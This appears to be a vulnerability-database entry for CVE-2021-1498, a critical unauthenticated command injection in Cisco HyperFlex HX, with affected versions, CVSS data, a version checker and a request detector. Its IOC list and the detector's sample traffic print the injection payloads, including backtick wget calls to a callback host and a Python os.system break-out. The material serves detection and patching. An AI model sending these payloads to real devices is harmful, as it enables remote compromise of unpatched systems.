CVE-2021-1498
published 2021-05-06

CVE-2021-1498: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command…

Priority: P1 · 9.8 critical (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability (remediation due 2021-11-17)
Exploited in the wild
EPSS: 100.00% (100.0th percentile)
Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.

Affected

4 ranges (two entries carry no version bound)

Vendor  Product                            Version range        Fixed in
cisco   cisco_hyperflex_hx_data_platform   (not specified)      (not specified)
cisco   hyperflex_hx                       (not specified)      (not specified)
cisco   hyperflex_hx_data_platform         < 4.0(2e)            4.0(2e)
cisco   hyperflex_hx_data_platform         >= 4.5, < 4.5(2a)    4.5(2a)
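Checking an installed build against the two bounded ranges above is not a string comparison: "4.0(10a)" sorts before "4.0(2e)" lexically but is a later release. The following is an added example, not code from the page or from Cisco; it parses the major.minor(maintenance letter) form the table uses and encodes exactly the two ranges listed. The sample versions in the demo loop are constructed for illustration, not a claim about which builds exist.

```python
import re

# Cisco HX Data Platform versions look like "4.0(2e)" or "4.5(2a)"; a bare
# "4.5" (no maintenance release) is accepted and sorts before "4.5(1a)".
_HX_VERSION = re.compile(r"^(\d+)\.(\d+)(?:\((\d+)([a-z]?)\))?$")

def parse_version(text):
    """Turn an HX version string into a tuple that compares in release order."""
    m = _HX_VERSION.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised HX Data Platform version: {text!r}")
    major, minor, maint, letter = m.groups()
    return (int(major), int(minor), int(maint or 0), letter or "")

# The two bounded ranges from the Affected table: < 4.0(2e), and >= 4.5 < 4.5(2a).
# A lower bound of None means "no lower bound".
AFFECTED_RANGES = [
    (None, "4.0(2e)"),
    ("4.5", "4.5(2a)"),
]

def is_affected(version):
    """True when the version falls inside one of the listed vulnerable ranges."""
    v = parse_version(version)
    for low, high in AFFECTED_RANGES:
        if (low is None or v >= parse_version(low)) and v < parse_version(high):
            return True
    return False

if __name__ == "__main__":
    # Constructed sample versions; "4.0(10a)" is only here to show the
    # lexicographic pitfall and is not claimed to be a shipped release.
    for ver in ("3.5(2b)", "4.0(2d)", "4.0(2e)", "4.0(10a)", "4.5", "4.5(1a)", "4.5(2a)"):
        state = "AFFECTED" if is_affected(ver) else "fixed / outside listed ranges"
        print(f"{ver:>9}: {state}")
```

Versions between 4.0(2e) and 4.5, for example 4.1(1a), fall outside both listed ranges and are reported as not affected; that mirrors the table, not an independent claim about those builds.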

Detection & IOCs (extracted from sources)

url: /storfs-asup
url: /auth/change
url: /auth
command (POST body): action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`
command (POST body): username=root&password={{url_encode(payload)}}
other (injected password value): 123",""$6$$)); import os;os.system("{{cmd}}");print(crypt.crypt("

The `{{...}}` tokens are scanner template placeholders (callback host, payload, command), not literal bytes on the wire.
  • Monitor for POST requests to /storfs-asup whose 'action', 'token' or 'mode' parameters contain shell command substitution (backtick-wrapped or $(...) commands). Decode the form body before matching: the backtick arrives as %60.
  • Monitor for POST requests to /auth/change or /auth with 'username=root' and a password field carrying a Python injection payload (e.g. 'import os;os.system(...)', or the quote-and-paren break-out into crypt.crypt shown above).
  • Command execution via the /auth/change path on the Cisco HyperFlex HX Installer Virtual Machine runs as the 'tomcat8' (Tomcat) user; look for unexpected child processes of the web service account (tomcat8 on the installer VM) on affected nodes.
  • The /storfs-asup endpoint (the backtick payload above) and the /auth/change endpoint (the crypt.crypt break-out, used by the public Metasploit module) are the attack surfaces used by public exploit tooling for unauthenticated command injection; alert on any unauthenticated POST to either path.
  • No workarounds are available for these vulnerabilities; only the vendor-supplied software updates (4.0(2e) and 4.5(2a), per the Affected table) remediate the issue.
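The two request-level detections above, as an added example that is not code from the page, from Cisco, or from any exploit module. It classifies captured HTTP requests given as (method, path, body) tuples; the body is percent-decoded first so the encoded payloads match. The sample traffic is constructed here for illustration (the callback host and the 'id' command are placeholders), and the `SAMPLE_REQUESTS` / `inspect_request` / `scan` names are this example's own.

```python
import re
from urllib.parse import parse_qs

# Endpoints named in the IOC list above.
ASUP_PATH = "/storfs-asup"
AUTH_PATHS = ("/auth", "/auth/change")

# Shell command substitution in a form value: `...` or $(...).
SHELL_SUBST = re.compile(r"`[^`]*`|\$\([^)]*\)")
# Python-level injection aimed at the crypt.crypt() call behind the auth endpoints.
PY_INJECT = re.compile(r"import\s+os|os\.system\s*\(|crypt\.crypt\s*\(|__import__\s*\(")

def inspect_request(method, path, body):
    """Classify one captured HTTP request; returns a finding string or None.

    parse_qs percent-decodes the form body before matching, because the
    exploit payloads arrive URL-encoded (%60 for a backtick, %28 for '(').
    """
    if method.upper() != "POST":
        return None
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if path == ASUP_PATH:
        hits = [k for k in ("action", "token", "mode") if SHELL_SUBST.search(form.get(k, ""))]
        if hits:
            return "command substitution in /storfs-asup parameter(s): " + ", ".join(hits)
        # The guidance is to alert on any unauthenticated POST here; a bare
        # request carries no session state, so surface it for review.
        return "POST to /storfs-asup (verify it was authenticated)"
    if path in AUTH_PATHS and form.get("username") == "root":
        if PY_INJECT.search(form.get("password", "")):
            return f"Python injection in password field of {path} (username=root)"
    return None

# Constructed sample traffic (not real captures): two exploit-shaped requests,
# two benign ones, and one non-POST that must be ignored.
SAMPLE_REQUESTS = [
    ("POST", "/storfs-asup",
     "action=&token=%60wget+http%3A%2F%2Fcallback.example%60&mode=%60wget+http%3A%2F%2Fcallback.example%60"),
    ("POST", "/auth/change",
     "username=root&password=123%22%2C%22%22%246%24%24%29%29%3B+import+os%3Bos.system%28%22id%22%29%3Bprint%28crypt.crypt%28%22"),
    ("POST", "/auth", "username=admin&password=Hunter2%21"),
    ("GET", "/storfs-asup", ""),
    ("POST", "/storfs-asup", "action=get&token=abc123&mode=normal"),
]

def scan(requests):
    """Run inspect_request over (method, path, body) tuples and keep the hits."""
    findings = []
    for method, path, body in requests:
        finding = inspect_request(method, path, body)
        if finding:
            findings.append((path, finding))
    return findings

if __name__ == "__main__":
    for path, finding in scan(SAMPLE_REQUESTS):
        print(f"{path:13} {finding}")
```

The benign-looking POST to /storfs-asup is still reported, at lower confidence, because the request alone cannot prove it was authenticated; pair this with the web server's session or client-IP context before paging anyone on it.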

CVSS provenance

Source        Version  Score  Severity  Vector
nvd           v3.1     9.8    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd           v2.0     7.5    HIGH      AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck              9.8    CRITICAL
cisa                   9.8    CRITICAL
vendor_cisco           9.8    CRITICAL